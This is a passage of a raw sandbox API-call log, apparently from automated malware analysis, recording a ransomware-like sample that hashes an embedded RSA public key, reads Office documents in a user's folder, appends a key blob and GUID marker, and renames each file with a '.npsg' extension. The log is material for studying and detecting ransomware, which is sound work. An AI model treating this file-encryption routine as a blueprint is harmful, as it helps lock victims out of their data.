PUBLIC KEY-----") returned 469 [0236.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.901] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.901] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.901] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.902] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.902] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.902] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.903] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.903] GetLastError () returned 0x0 [0236.903] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.903] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.903] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.903] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.903] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd940) returned 0x3b95d50 [0236.903] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b959c8 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400380 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95a10 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400398 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003c8 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400428 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003e0 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.904] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b81cd0 [0236.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003c8 | out: hHeap=0x620000) returned 1 [0236.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003e0 | out: hHeap=0x620000) returned 1 [0236.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400428 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003e0 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34003c8 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003e0 | out: hHeap=0x620000) returned 1 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003c8 | out: hHeap=0x620000) returned 1 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.905] GetCurrentThreadId () returned 0x5b4 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79858 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.905] GetCurrentThreadId () returned 0x5b4 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4dd8 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400428 [0236.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003c8 [0236.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003e0 [0236.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003b0 [0236.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400440 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400410 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003f8 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400458 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003f8 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003f8 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400410 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003c8 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003c8 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400458 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0236.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003c8 | out: hHeap=0x620000) returned 1 [0236.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0236.908] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd93b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.908] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.908] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.908] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.908] CloseHandle (hObject=0x644) returned 1 [0236.910] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Xp74G9c0b92CjC.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xp74g9c0b92cjc.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Xp74G9c0b92CjC.docx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xp74g9c0b92cjc.docx.npsg")) returned 1 [0236.913] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1e23410, ftCreationTime.dwHighDateTime=0x1d5c4a4, ftLastAccessTime.dwLowDateTime=0x1843f9b0, ftLastAccessTime.dwHighDateTime=0x1d5c4f4, ftLastWriteTime.dwLowDateTime=0x1843f9b0, ftLastWriteTime.dwHighDateTime=0x1d5c4f4, nFileSizeHigh=0x0, nFileSizeLow=0x14a7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y07sKhvf19TTFsN.pptx", cAlternateFileName="Y07SKH~1.PPT")) returned 1 [0236.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y07sKhvf19TTFsN.pptx") returned=".pptx" [0236.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y07sKhvf19TTFsN.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y07skhvf19ttfsn.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.914] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=84605) returned 1 [0236.914] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.916] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14a57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.916] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.917] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x14a7d, lpOverlapped=0x0) returned 1 [0236.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.918] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.919] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.919] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.919] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.919] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.919] GetLastError () returned 0x0 [0236.919] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.919] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.920] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.920] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.920] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.920] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.921] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14a7d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.921] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.921] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.921] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.921] CloseHandle (hObject=0x644) returned 1 [0236.924] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y07sKhvf19TTFsN.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y07skhvf19ttfsn.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y07sKhvf19TTFsN.pptx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y07skhvf19ttfsn.pptx.npsg")) returned 1 [0236.925] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1e23410, ftCreationTime.dwHighDateTime=0x1d5c4a4, ftLastAccessTime.dwLowDateTime=0x1843f9b0, ftLastAccessTime.dwHighDateTime=0x1d5c4f4, ftLastWriteTime.dwLowDateTime=0x1843f9b0, ftLastWriteTime.dwHighDateTime=0x1d5c4f4, nFileSizeHigh=0x0, nFileSizeLow=0x14a7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y07sKhvf19TTFsN.pptx", cAlternateFileName="Y07SKH~1.PPT")) returned 0 [0236.926] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0236.926] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0236.926] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 